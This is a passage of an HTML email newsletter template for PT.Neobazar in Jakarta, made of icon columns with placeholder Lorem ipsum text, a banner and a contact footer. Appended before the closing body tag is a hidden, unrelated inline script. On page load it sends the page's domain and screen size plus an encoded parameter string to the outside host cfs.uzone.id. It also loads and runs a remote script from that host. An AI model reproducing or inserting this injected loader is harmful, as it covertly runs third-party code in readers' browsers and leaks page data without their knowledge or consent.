											<td mc:edit="text1007" align="center" class="text_color_607580" style="color: #607580; font-size: 11px;line-height: 1.8;font-style: italic; font-weight: 400; font-family: 'Open Sans', Helvetica, sans-serif; mso-line-height-rule: exactly;">
												<div class="editable-text" style="line-height: 1.8;">
													<span class="text_container">Lorem ipsum dolor sit met, sed do eiusmod tempor incidiasd quis nostrud .</span>
												</div>
											</td>
										</tr>
									</tbody></table>
								</td>
							</tr>
							<!-- padding-bottom -->
							<tr><td height="40"></td></tr>
						</tbody></table><!-- END column-2-->

						<!-- vertical gap -->
						<table class="tablet_hide" width="50" align="left" border="0" cellspacing="0" cellpadding="0">
							<tbody><tr><td height="1"></td></tr>
						</tbody></table>

						<!-- column-3  -->
						<table class="table1-3" width="166" align="left" border="0" cellspacing="0" cellpadding="0">
							<tbody><tr>
								<td>
									<table align="center" border="0" cellspacing="0" cellpadding="0" style="max-width: 166px;">							
										<tbody><tr>
											<td align="center">
												<div style="border-style: none !important; display: block; border: 0 !important;" class="editable-img">
													<img editable="true" mc:edit="image1003" src="http://emails.castellab.com/firemail/images/01-circle-icon-settings.png" style="display:block; line-height:0; font-size:0; border:0;" border="0" alt="">
												</div>
											</td>
										</tr>
										<!-- horizontal gap -->
										<tr><td height="20"></td></tr>

										<tr>
											<td mc:edit="text1008" align="center" class="text_color_282828" style="color: #282828; font-size: 13px; font-weight: 600; font-family: 'Open Sans', Helvetica, sans-serif; mso-line-height-rule: exactly;">
												<div class="editable-text">
													<span class="text_container">Dummy Content</span>
												</div>
											</td>
										</tr>
										<!-- horizontal gap -->
										<tr><td height="10"></td></tr>

										<tr>
											<td mc:edit="text1009" align="center" class="text_color_607580" style="color: #607580; font-size: 11px;line-height: 1.8;font-style: italic; font-weight: 400; font-family: 'Open Sans', Helvetica, sans-serif; mso-line-height-rule: exactly;">
												<div class="editable-text" style="line-height: 1.8;">
													<span class="text_container">Lorem ipsum dolor sit met, sed do eiusmod tempor incidiasd quis nostrud .</span>
												</div>
											</td>
										</tr>
									</tbody></table>
								</td>
							</tr>
							<!-- padding-bottom -->
							<tr><td height="40"></td></tr>
						</tbody></table><!-- END column-3-->
					</td>
				</tr><!-- END row-1 -->

				<!-- row-2 -->
				<tr>
					<td>
						<!-- column-1  -->
						<table class="table1-3" width="166" align="left" border="0" cellspacing="0" cellpadding="0">
							<tbody><tr>
								<td>
									<table align="center" border="0" cellspacing="0" cellpadding="0" style="max-width: 166px;">							
										<tbody><tr>
											<td align="center">
												<div style="border-style: none !important; display: block; border: 0 !important;" class="editable-img">
													<img editable="true" mc:edit="image1004" src="http://emails.castellab.com/firemail/images/01-circle-icon-rain.png" style="display:block; line-height:0; font-size:0; border:0;" border="0" alt="">
												</div>
											</td>
										</tr>
										<!-- horizontal gap -->
										<tr><td height="20"></td></tr>

										<tr>
											<td mc:edit="text1010" align="center" class="text_color_282828" style="color: #282828; font-size: 13px; font-weight: 600; font-family: 'Open Sans', Helvetica, sans-serif; mso-line-height-rule: exactly;">
												<div class="editable-text">
													<span class="text_container">Dummy Content</span>
												</div>
											</td>
										</tr>
										<!-- horizontal gap -->
										<tr><td height="10"></td></tr>

										<tr>
											<td mc:edit="text1011" align="center" class="text_color_607580" style="color: #607580; font-size: 11px;line-height: 1.8;font-style: italic; font-weight: 400; font-family: 'Open Sans', Helvetica, sans-serif; mso-line-height-rule: exactly;">
												<div class="editable-text" style="line-height: 1.8;">
													<span class="text_container">Lorem ipsum dolor sit met, sed do eiusmod tempor incidiasd quis nostrud .</span>
												</div>
											</td>
										</tr>
									</tbody></table>
								</td>
							</tr>
							<!-- padding-bottom -->
							<tr><td height="40"></td></tr>
						</tbody></table><!-- END column-1-->

						<!-- vertical gap -->
						<table class="tablet_hide" width="50" align="left" border="0" cellspacing="0" cellpadding="0">
							<tbody><tr><td height="1"></td></tr>
						</tbody></table>

						<!-- column-2  -->
						<table class="table1-3" width="166" align="left" border="0" cellspacing="0" cellpadding="0">
							<tbody><tr>
								<td>
									<table align="center" border="0" cellspacing="0" cellpadding="0" style="max-width: 166px;">
										<tbody><tr>
											<td align="center">
												<div style="border-style: none !important; display: block; border: 0 !important;" class="editable-img">
													<img editable="true" mc:edit="image1005" src="http://emails.castellab.com/firemail/images/01-circle-icon-clock.png" style="display:block; line-height:0; font-size:0; border:0;" border="0" alt="">
												</div>
											</td>
										</tr>
										<!-- horizontal gap -->
										<tr><td height="20"></td></tr>

										<tr>
											<td mc:edit="text1012" align="center" class="text_color_282828" style="color: #282828; font-size: 13px; font-weight: 600; font-family: 'Open Sans', Helvetica, sans-serif; mso-line-height-rule: exactly;">
												<div class="editable-text">
													<span class="text_container">Dummy Content</span>
												</div>
											</td>
										</tr>
										<!-- horizontal gap -->
										<tr><td height="10"></td></tr>

										<tr>
											<td mc:edit="text1013" align="center" class="text_color_607580" style="color: #607580; font-size: 11px;line-height: 1.8;font-style: italic; font-weight: 400; font-family: 'Open Sans', Helvetica, sans-serif; mso-line-height-rule: exactly;">
												<div class="editable-text" style="line-height: 1.8;">
													<span class="text_container">Lorem ipsum dolor sit met, sed do eiusmod tempor incidiasd quis nostrud .</span>
												</div>
											</td>
										</tr>
									</tbody></table>
								</td>
							</tr>
							<!-- padding-bottom -->
							<tr><td height="40"></td></tr>
						</tbody></table><!-- END column-2-->

						<!-- vertical gap -->
						<table class="tablet_hide" width="50" align="left" border="0" cellspacing="0" cellpadding="0">
							<tbody><tr><td height="1"></td></tr>
						</tbody></table>

						<!-- column-3  -->
						<table class="table1-3" width="166" align="left" border="0" cellspacing="0" cellpadding="0">
							<tbody><tr>
								<td>
									<table align="center" border="0" cellspacing="0" cellpadding="0" style="max-width: 166px;">							
										<tbody><tr>
											<td align="center">
												<div style="border-style: none !important; display: block; border: 0 !important;" class="editable-img">
													<img editable="true" mc:edit="image1006" src="http://emails.castellab.com/firemail/images/01-circle-icon-message.png" style="display:block; line-height:0; font-size:0; border:0;" border="0" alt="">
												</div>
											</td>
										</tr>
										<!-- horizontal gap -->
										<tr><td height="20"></td></tr>

										<tr>
											<td mc:edit="text1014" align="center" class="text_color_282828" style="color: #282828; font-size: 13px; font-weight: 600; font-family: 'Open Sans', Helvetica, sans-serif; mso-line-height-rule: exactly;">
												<div class="editable-text">
													<span class="text_container">Dummy Content</span>
												</div>
											</td>
										</tr>
										<!-- horizontal gap -->
										<tr><td height="10"></td></tr>

										<tr>
											<td mc:edit="text1015" align="center" class="text_color_607580" style="color: #607580; font-size: 11px;line-height: 1.8;font-style: italic; font-weight: 400; font-family: 'Open Sans', Helvetica, sans-serif; mso-line-height-rule: exactly;">
												<div class="editable-text" style="line-height: 1.8;">
													<span class="text_container">Lorem ipsum dolor sit met, sed do eiusmod tempor incidiasd quis nostrud .</span>
												</div>
											</td>
										</tr>
									</tbody></table>
								</td>
							</tr>
							<!-- padding-bottom -->
							<tr><td height="40"></td></tr>
						</tbody></table><!-- END column-3-->
					</td>
				</tr><!-- END row-2 -->
				<!-- padding-bottom -->
				<tr><td height="20"></td></tr>
			</tbody></table><!-- END container -->
		</td>
	</tr>
</tbody></table><!-- END wrapper -->





<!-- section-11 -->
<table class="table_full editable-bg-color bg_color_6a1b9a editable-bg-image" bgcolor="#6a1b9a" width="100%" align="center" mc:repeatable="castellab" mc:variant="Header" cellspacing="0" cellpadding="0" border="0" style="background-image: url(#); background-position: top center; background-repeat: no-repeat; border-collapse: collapse; mso-table-lspace: 0pt; mso-table-rspace: 0pt;" background="#">
	<tbody><tr>
		<td>
			<table class="table1" width="600" align="center" border="0" cellspacing="0" cellpadding="0" style="margin: 0 auto;">
				<!-- padding-top -->
				<tbody><tr><td height="60"></td></tr>
				<tr>
					<td>
						<!-- column-1  -->
						<table class="table1-2" width="100%" align="center" border="0" cellspacing="0" cellpadding="0">
							<tbody><tr>
								<td mc:edit="text1101" align="center" class="text_color_ffffff" style="line-height: 1.5;letter-spacing: 1px;color: #ffffff; font-size: 16px; font-weight: 500; font-family: 'Open Sans', Helvetica, sans-serif; mso-line-height-rule: exactly;">
									<div class="editable-text">
										<span class="text_container">HOW MANY COMPLEMENTS</span>
									</div>
								</td>
							</tr>
							<!-- horizontal gap -->
							<tr><td height="15"></td></tr>

							<tr>
								<td mc:edit="text1102" align="center" class="text_color_ffffff" style="line-height: 1.5;letter-spacing: 1px;color: #ffffff; font-size: 16px; font-weight: 500; font-family: 'Open Sans', Helvetica, sans-serif; mso-line-height-rule: exactly;">
									<div class="editable-text">
										<span class="text_container">DID YOU GOT ALREADY?</span>
									</div>
								</td>
							</tr>
						</tbody></table><!-- END column-1 -->
					</td>
				</tr>
				<!-- padding-top -->
				<tr><td height="60"></td></tr>
			</tbody></table><!-- END container -->
		</td>
	</tr>
</tbody></table><!-- END wrapper -->








<!-- section-14 -->
<table class="table_full editable-bg-color bg_color_f9f9f9 editable-bg-image" bgcolor="#f9f9f9" width="100%" align="center" mc:repeatable="castellab" mc:variant="Header" cellspacing="0" cellpadding="0" border="0" style="border-bottom: 1px solid #d7d7d7;background-image: url(#); background-position: top center; background-repeat: no-repeat; border-collapse: collapse; mso-table-lspace: 0pt; mso-table-rspace: 0pt;" background="#">
	<tbody><tr>
		<td>
			<table class="table1" width="600" align="center" border="0" cellspacing="0" cellpadding="0" style="margin: 0 auto;">
				<!-- padding-top -->
				<tbody><tr><td height="60"></td></tr>
				<tr>
					<td class="editable-img" align="center">
						<a href="http://www.neobazar.net">
							<img editable="true" mc:edit="image1401" src="http://i.imgur.com/UJOh5P0.png?1" style="display:block; line-height:0; font-size:0; border:0;" border="0" alt="image">
						</a>
					</td>
				</tr>
				<!-- horizontal gap -->
				<tr><td height="20"></td></tr>

				<tr>
					<td mc:edit="text1401" align="center" class="text_color_512da8" style="color: #512da8; font-size: 24px; font-weight: 900; font-family: 'Open Sans', Helvetica, sans-serif; mso-line-height-rule: exactly;">
						<div class="editable-text"><multiline><a class="text_color_512da8" href="#" style="text-decoration: none; color: #512da8;">P</a>T.NEOBAZAR</multiline></div>
					</td>
				</tr>
				<!-- horizontal gap -->
				<tr><td height="20"></td></tr>

				<tr>
					<td mc:edit="text1402" align="center" class="text_color_282828" style="color: #282828; font-size: 14px;line-height: 2;font-style: italic;font-weight: 400; font-family: 'Open Sans', Helvetica, sans-serif; mso-line-height-rule: exactly;">
						<div class="editable-text"><multiline><p>Plaza 3 Pondok Indah, Blok F-06 Lt. 2, Jl. TB Simatupang,Pondok Pinang, Jakarta Selatan 12310</p>
</multiline></div>
					</td>
				</tr>
				
				<tr>
					<td mc:edit="text1403" align="center" class="text_color_282828" style="color: #282828; font-size: 14px;line-height: 2;font-style: italic;font-weight: 400; font-family: 'Open Sans', Helvetica, sans-serif; mso-line-height-rule: exactly;">
						<div class="editable-text"><multiline>thlee@neobazar.net</multiline></div>
					</td>
				</tr>
				<!-- horizontal gap -->
				<tr><td height="45"></td></tr>
				
				<tr>
					<td mc:edit="text1404" align="center" class="text_color_282828" style="color: #282828; font-size: 14px;line-height: 2;font-style: italic;font-weight: 400; font-family: 'Open Sans', Helvetica, sans-serif; mso-line-height-rule: exactly;">
						<div class="editable-text"><multiline></multiline></div>
					</td>
				</tr>
				<!-- padding-bottom -->
				<tr><td height="60"></td></tr>
			</tbody></table><!-- END container -->
		</td>
	</tr>
</tbody></table><!-- END wrapper -->





<!-- section-15 -->
<table class="table_full editable-bg-color bg_color_ebebeb editable-bg-image" bgcolor="#ebebeb" width="100%" align="center" mc:repeatable="castellab" mc:variant="Header" cellspacing="0" cellpadding="0" border="0" style="background-image: url(#); background-position: top center; background-repeat: no-repeat; border-collapse: collapse; mso-table-lspace: 0pt; mso-table-rspace: 0pt;" background="#">
	<!-- padding-top -->
	<tbody><tr><td height="30"></td></tr>
	<tr>
		<td>
			<table class="table1" width="600" align="center" border="0" cellspacing="0" cellpadding="0" style="margin: 0 auto;">
				<tbody><tr>
					<td mc:edit="text1501" align="center" class="text_color_282828" style="color: #282828; font-size: 14px;line-height: 2;font-style: italic;font-weight: 600; font-family: 'Open Sans', Helvetica, sans-serif; mso-line-height-rule: exactly;">
						<div class="editable-text"><multiline> 2017 All rights Reserved - PT.neobazar</multiline></div>
					</td>
				</tr>
			</tbody></table><!-- END container -->
		</td>
	</tr>
	<!-- padding-bottom -->
	<tr><td height="30"></td></tr>
</tbody></table><!-- END wrapper -->


<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.uzone.id/2fn7a2/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582CL4NjpNgssKZywukukaaKr9ZGtAm%2bkc%2fJw8eS2K%2fMOaaLLNzdbjg76VqjpZLSO%2fW1UjlcaW55Bp0qS4m0iv5sY%2bPLWk2tNAdDLulL7GhSevtWSdj%2b71I0C0WkKcqJYpxc32TUxVIQi2WKixZRb8FRlVKqIIBPq6aaCyQFPR1qa3EdD7bZkLke2KGUNOb2A3dHIrOUVPxLwij9HgeaGoKWqHRo8SSuK7hKoTGYVbaiGTZ78LNUhYE%2f2dscfalYOPV5YDKkr%2fT%2bU78sgx%2bloAdfYG%2b1u9rjjMMUyA5%2bF9fYI%2fr8YkmfW%2babNAF8E0uKOq1V%2fAGakarplEUJ1PcRvSPqA%2fbg7fFdRREuAxUJQ4O3RefId6R3K4d5XXwmyhX8VT8yE2aA6wK1ZMgdfoRPDvhVA5x4DZEWqnvhu11VEmfIFBR%2bHQXDuhIIFMexsk1DbNxP8dAjRXj%2b5HMhPRxrYiRLrpIo269Z8vh%2fce32moAUJg0lS3sNEXUOHWeKZU1Ejc%2bNa1qTwAN3X0BhVK09XC6KvPJi8fFtU9oNE9F6u5xgu%2fSGR2y3IKVU5ebBFduPa4YfDNxH4DSNd%2fVZmRkNcR17kCQWBn%2fM%2bHPg%3d%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
</html>